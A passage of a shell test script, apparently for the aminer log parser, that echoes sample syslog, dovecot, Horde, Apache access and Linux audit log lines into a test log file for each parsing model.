$LOGFILE echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> $LOGFILE echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." >> $LOGFILE echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> $LOGFILE echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> $LOGFILE echo "Feb 29 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> $LOGFILE echo "Feb 29 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> $LOGFILE # missing model/service/systemd/service - no log found! echo "Feb 29 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> $LOGFILE echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> $LOGFILE echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." >> $LOGFILE echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> $LOGFILE echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> $LOGFILE echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> $LOGFILE echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> $LOGFILE echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> $LOGFILE echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> $LOGFILE echo "Feb 29 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> $LOGFILE ;; SyslogParsingModelAIT-LDSv2) echo "Feb 28 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > $LOGFILE echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> $LOGFILE echo "Feb 28 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> $LOGFILE echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> $LOGFILE echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> $LOGFILE echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> $LOGFILE echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> $LOGFILE echo "Feb 28 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> $LOGFILE echo "Feb 28 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: auth: Error: auth worker: Aborted PASSV request for marjory: Worker process died unexpectedly" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: auth-worker(2233): Fatal: Error reading configuration: Timeout reading config from /var/run/dovecot/config" >> $LOGFILE echo "Feb 28 11:39:35 mail-2 dovecot: master: Error: service(auth-worker): command startup failed, throttling for 2 secs" >> $LOGFILE echo 'Feb 28 11:39:46 mail-2 HORDE: [imp] Login success for marjory (192.168.10.18) to {imap://localhost/} [pid 1764 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Feb 28 17:18:23 mail-2 HORDE: [imp] Message sent to marcelle@mail.insect.com, merlene@mail.insect.com from les (192.168.10.18) [pid 9596 on line 970 of "/var/www/mail.insect.com/imp/lib/Compose.php"]' >> $LOGFILE echo 'Feb 28 20:01:48 mail-2 HORDE: [imp] FAILED LOGIN for violet (192.168.10.18) to {imap://localhost/} [pid 14794 on line 156 of "/var/www/mail.insect.com/imp/lib/Auth.php"]' >> $LOGFILE echo 'Mar 1 06:25:38 mail HORDE: [imp] [status] Could not open mailbox "INBOX". [pid 999 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 1 06:27:56 mail HORDE: [imp] [getSyncToken] IMAP error reported by server. [pid 1127 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Feb 28 12:12:54 mail-2 HORDE: [horde] Login success for dorie to horde (192.168.10.18) [pid 2272 on line 163 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 28 12:13:00 mail-2 HORDE: [horde] User marjory logged out of Horde (192.168.10.18) [pid 2988 on line 106 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Feb 28 17:07:07 mail-2 HORDE: [horde] FAILED LOGIN for marcelle to horde (192.168.10.98) [pid 8517 on line 198 of "/var/www/mail.insect.com/login.php"]' >> $LOGFILE echo 'Mar 1 18:22:40 mail HORDE: [imp] [login] Authentication failed. [pid 12890 on line 730 of "/var/www/mail.onion.com/imp/lib/Imap.php"]' >> $LOGFILE echo 'Mar 4 18:55:05 mail HORDE: [turba] PHP ERROR: finfo_file(): Empty filename or path [pid 11642 on line 166 of "/usr/share/php/Horde/Mime/Magic.php"]' >> $LOGFILE echo 'Mar 4 18:50:51 mail HORDE: [horde] PHP ERROR: Cannot modify header information - headers already sent [pid 11019 on line 0 of "Unknown"]' >> $LOGFILE echo 'Mar 4 18:01:23 mail HORDE: Guest user is not authorized for Horde (Host: 192.168.10.81). [pid 4815 on line 324 of "/usr/share/php/Horde/Registry.php"]' >> $LOGFILE echo 'Mar 4 18:10:08 mail HORDE: PHP ERROR: rawurlencode() expects parameter 1 to be string, array given [pid 6556 on line 302 of "/usr/share/php/Horde/Url.php"]' >> $LOGFILE # missing model/service/horde/horde/free_msg - no log found! echo "Feb 28 12:39:02 mail-0 CRON[11260]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)" >> $LOGFILE echo "Feb 28 06:25:01 mail-1 CRON[27486]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "Feb 28 15:42:36 mail-1 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=marcelino rhost=127.0.0.1 user=marcelino" >> $LOGFILE echo "Mar 1 03:09:18 mail-0 systemd[1]: Starting Clean php session files..." >> $LOGFILE echo "Mar 1 03:09:19 mail-0 systemd[1]: Started Clean php session files." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Starting Cleanup of Temporary Directories..." >> $LOGFILE echo "Mar 1 18:26:18 mail systemd[1]: Started Cleanup of Temporary Directories." >> $LOGFILE echo "Mar 2 06:37:52 mail systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "Mar 2 06:37:53 mail systemd[1]: Started Daily apt upgrade and clean activities." >> $LOGFILE echo "Mar 2 12:30:18 mail systemd[1]: Starting Daily apt download activities..." >> $LOGFILE echo "Mar 2 12:30:19 mail systemd[1]: Started Daily apt download activities." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Starting Security Auditing Service..." >> $LOGFILE echo "Mar 3 06:29:00 mail systemd[1]: Started Security Auditing Service." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopping Security Auditing Service..." >> $LOGFILE echo "Mar 4 06:29:05 mail systemd[1]: Stopped Security Auditing Service." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloading The Apache HTTP Server." >> $LOGFILE echo "Mar 5 06:25:35 mail systemd[1]: Reloaded The Apache HTTP Server." >> $LOGFILE echo "Feb 28 11:52:32 mail-2 systemd[1]: Mounting Arbitrary Executable File Formats File System..." >> $LOGFILE echo "Feb 28 11:52:32 mail-2 systemd[1]: Mounted Arbitrary Executable File Formats File System." >> $LOGFILE echo "Feb 28 13:56:59 mail-2 systemd[1]: apt-daily.timer: Adding 6h 4min 46.743459s random time." >> $LOGFILE # missing model/service/systemd/service - no log found! echo "Feb 28 07:24:02 mail-0 kernel: [47678.309129] [] ? ret_from_fork+0x57/0x70" >> $LOGFILE echo "Mar 5 06:29:07 mail augenrules[17378]: backlog_wait_time 0" >> $LOGFILE echo "Mar 5 06:29:07 mail auditd[17377]: dispatch error reporting limit reached - ending report notification." >> $LOGFILE echo "Mar 5 06:29:07 mail auditd: audit log is not writable by owner" >> $LOGFILE echo "Mar 4 06:29:05 mail audispd: No plugins found, exiting" >> $LOGFILE echo 'Mar 3 06:29:01 mail liblogging-stdlog: [origin software="rsyslogd" swVersion="8.24.0" x-pid="480" x-info="http://www.rsyslog.com"] rsyslogd was HUPed' >> $LOGFILE echo "Mar 1 09:25:16 mail freshclam[22090]: Sun Mar 1 09:25:16 2020 -> bytecode.cvd is up to date (version: 331, sigs: 94, f-level: 63, builder: anvilleg)" >> $LOGFILE echo "Mar 1 07:26:09 mail dhclient[418]: DHCPREQUEST of 192.168.10.21 on eth0 to 192.168.10.2 port 67" >> $LOGFILE echo "Mar 1 00:59:38 mail-2 dhclient[387]: DHCPACK of 192.168.10.21 from 192.168.10.2" >> $LOGFILE echo "Feb 28 21:12:42 mail-2 dhclient[418]: bound to 192.168.10.21 -- renewal in 36807 seconds." >> $LOGFILE ;; AminerParsingModel) sudo cp ./demo/aminer/jsonConverterHandler-demo-config.py /tmp/demo-config.py sudo ./demo/aminer/aminerDemo.sh > $LOGFILE sed -i -e 1,2d $LOGFILE sed -i -e "/Generating data for the LinearNumericBinDefinition histogram report../d" $LOGFILE sed -i -e "/Generating data for the ModuloTimeBinDefinition histogram report../d" $LOGFILE sed -i "/^CPU Temp: /d" $LOGFILE sed -i "/^first$/d" $LOGFILE sed -i "/^second$/d" $LOGFILE sed -i "/^third$/d" $LOGFILE sed -i "/^fourth$/d" $LOGFILE cat >> $CONFIG_PATH < $LOGFILE echo '127.0.0.1 - - [01/May/2020:21:44:53 +0200] "GET /phpmyadmin/sql.php?server=1&db=seconlineportaldb&table=CONTRACT&pos=0 HTTP/1.1" 200 5326 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0"' >> $LOGFILE echo '127.0.0.1 - - [01/Apr/2020:09:19:23 +0200] "GET /phpmyadmin/themes/pmahomme/img/b_drop.png HTTP/1.1" 304 180 "http://localhost/phpmyadmin/phpmyadmin.css.php?nocache=6340393753ltr&server=1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0"' >> $LOGFILE echo '111.222.333.123 HOME user1 [01/Feb/1998:01:08:39 -0800] "GET /bannerad/ad.htm HTTP/1.0" 200 198 "http://www.referrer.com/bannerad/ba_intro.htm" "Mozilla/4.01 (Macintosh; I; PPC)"' >> $LOGFILE echo '::1 - - [31/Mar/2020:15:14:28 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1c (internal dummy connection)"' >> $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:55 +0000] "POST /nag/task/save.php HTTP/1.1" 200 5220 "-" "-"' >> $LOGFILE echo 'www.google.com - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; AudispdParsingModel) echo "audispd: type=ADD_GROUP msg=audit(1525173583.598:2104): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding group acct=\"raman\" exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" > $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.670:2105): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding user id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" >> $LOGFILE echo "audispd: type=ADD_USER msg=audit(1525173583.677:2106): pid=45406 uid=0 auid=0 ses=160 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=adding home directory id=1003 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=pts/1 res=success'" >> $LOGFILE echo 'type=ANOM_ABEND msg=audit(1459467717.181:189187): auid=4294967295 uid=977 gid=2010 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 pid=40239 comm="radiusd" reason="memory violation" sig=11' >> $LOGFILE echo 'audispd: type=ANOM_ABEND msg=audit(1459370041.594:534): auid=10000 uid=0 gid=0 ses=6 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 pid=3697 comm="sshd" reason="memory violation" sig=6' >> $LOGFILE echo "audispd: type=ANOM_ACCESS_FS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ADD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_AMTU_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_CRYPTO_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_DEL_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_EXEC msg=audit(1222174623.498:608): user pid=12965 uid=1 auid=2 ses=1 msg='op=PAM:unix_chkpwd acct=\"snap\" exe=\"/sbin/unix_chkpwd\" (hostname=?, addr=?, terminal=pts/0 res=failed)'" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_FAILURES msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_LOCATION msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_SESSIONS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_LOGIN_TIME msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_DAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MAX_MAC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MK_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_MOD_ACCT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=ANOM_PROMISCUOUS msg=audit(1390181243.575:738): dev=vethDvSeyL prom=256 old_prom=256 auid=4294967295 uid=0 gid=0 ses=4294967295" >> $LOGFILE echo "audispd: type=ANOM_RBAC_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_RBAC_INTEGRITY_FAIL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ANOM_ROOT_TRANS msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "type=AVC msg=audit(1226270358.848:238): avc: denied { write } for pid=13349 comm=\"certwatch\" name=\"cache\" dev=dm-0 ino=218171 scontext=system_u:system_r:certwatch_t:s0 tcontext=system_u:object_r:var_t:s0 tclass=dir" >> $LOGFILE echo "audispd: type=AVC_PATH msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo 'audispd: type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE echo "type=CAPSET msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHGRP_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CHUSER_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CONFIG_CHANGE msg=audit(1368831799.081:466947): auid=4294967295 ses=4294967295 op=\"remove rule\" path=\"/path/to/my/bin0\" key=(null) list=4 res=1" >> $LOGFILE echo "type=CONFIG_CHANGE msg=audit(1479097266.018:224): auid=500 ses=2 op=\"updated_rules\" path=\"/etc/passwd\" key=\"passwd_changes\" list=4 res=1" >> $LOGFILE echo "audispd: type=CRED_ACQ msg=audit(1450894634.199:1276): pid=1956 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_DISP msg=audit(1450894635.111:1281): pid=1956 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRED_REFR msg=audit(1450894634.211:1279): pid=1958 uid=0 auid=0 ses=213 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=CRYPTO_FAILURE_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_KEY_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGIN msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_PARAM_CHANGE_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=CRYPTO_REPLAY_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=CRYPTO_SESSION msg=audit(1150750972.008:3281471): user pid=1111 uid=0 auid=1111 msg='op=start direction=from-server cipher=aes128-ctr ksize=128 rport=40791 laddr=192.168.22.22 lport=22 id=4294967295 exe=\"/usr/sbin/sshd\" (hostname=?, addr=205.22.22.22, terminal=? res=success)'" >> $LOGFILE echo "audispd: type=CRYPTO_TEST_USER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=CWD msg=audit(1450767416.248:3295858): cwd="/"' >> $LOGFILE echo "audispd: type=DAC_CHECK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_ABORT msg=audit(1339336882.189:9206): auditd error halt, auid=4294967295 pid=3095 res=failed" >> $LOGFILE echo "audispd: type=DAEMON_ACCEPT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CLOSE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_CONFIG msg=audit(1264985324.554:4915): auditd error getting hup info - no change, sending auid=? pid=? subj=? res=failed" >> $LOGFILE echo "audispd: type=DAEMON_END msg=audit(1450876093.165:8729): auditd normal halt, sending auid=0 pid=1 subj= res=success" >> $LOGFILE echo "audispd: type=DAEMON_RESUME msg=audit(1300385209.456:8846): auditd resuming logging, sending auid=? pid=? subj=? res=success" >> $LOGFILE echo "audispd: type=DAEMON_ROTATE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=DAEMON_START msg=audit(1450875964.131:8728): auditd start, ver=2.4 format=raw kernel=3.16.0-4-amd64 auid=4294967295 pid=1437 res=failed" >> $LOGFILE echo "audispd: type=DEL_GROUP msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=DEL_USER msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=EOE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo 'audispd: type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' >> $LOGFILE echo "audispd: type=FD_PAIR msg=audit(1431919799.945:49458): fd0=5 fd1=6" >> $LOGFILE echo "audispd: type=FS_RELABEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=GRP_AUTH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_DATA msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_HASH msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_METADATA msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_PCR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_RULE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=INTEGRITY_STATUS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=IPC_SET_PERM msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=KERNEL_OTHER msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_LEVEL_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LABEL_OVERRIDE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=LOGIN msg=audit(1450767601.778:3296208): login pid=15763 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=2260" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CIPSOV4_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_CONFIG_CHANGE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_IPSEC_EVENT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_ADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_MAP_DEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_POLICY_LOAD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_STATUS msg=audit(1336836093.835:406): enforcing=1 old_enforcing=0 auid=0 ses=2" >> $LOGFILE echo "audispd: type=MAC_UNLBL_ALLOW msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCADD msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MAC_UNLBL_STCDEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MMAP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_GETSETATTR msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_NOTIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_OPEN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=MQ_SENDRECV msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=NETFILTER_CFG msg=audit(1479622038.866:2): table=filter family=2 entries=0" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.386:228): mark=0xae8a2732 saddr=127.0.0.1 daddr=127.0.0.1 proto=17" >> $LOGFILE echo "audispd: type=NETFILTER_PKT msg=audit(1487874761.381:227): mark=0x223894b7 saddr=::1 daddr=::1 proto=58" >> $LOGFILE echo "audispd: type=OBJ_PID msg=audit(1279134100.434:193): opid=1968 oauid=-1 ouid=0 oses=-1 obj= ocomm=\"sleep\"" >> $LOGFILE echo 'audispd: type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'audispd: type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_REMOTE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_UNLOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ALERT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ANOMALY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_HALT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_KILL_PROC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SEBOOL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SINGLE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_ACCESS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_ASSIGN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_MODIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_REMOVE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SELINUX_ERR msg=audit(1311948547.151:138): op=security_compute_av reason=bounds scontext=system_u:system_r:anon_webapp_t:s0-s0:c0,c100,c200 tcontext=system_u:object_r:security_t:s0 tclass=dir perms=ioctl,read,lock" >> $LOGFILE echo "audispd: type=SERVICE_START msg=audit(1450876900.115:30): pid=1 uid=0 auid=4294967295 ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'" >> $LOGFILE echo "audispd: type=SERVICE_STOP msg=audit(1450876900.115:31): pid=1 uid=0 auid=4294967295 ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'" >> $LOGFILE echo "audispd: type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "audispd: type=SOCKETCALL msg=audit(1134642541.683:201): nargs=3 a0=10 a1=3 a2=9" >> $LOGFILE echo 'audispd: type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo "audispd: type=SYSTEM_BOOT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_RUNLEVEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_SHUTDOWN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TRUSTED_APP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TTY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_ACCT msg=audit(1234877011.795:7732): user pid=26127 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/sbin/sshd\" (hostname=jupiter.example.com, addr=192.168.2.100, terminal=ssh res=success)'" >> $LOGFILE echo "audispd: type=USER_AUTH msg=audit(1451403184.143:1834): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" 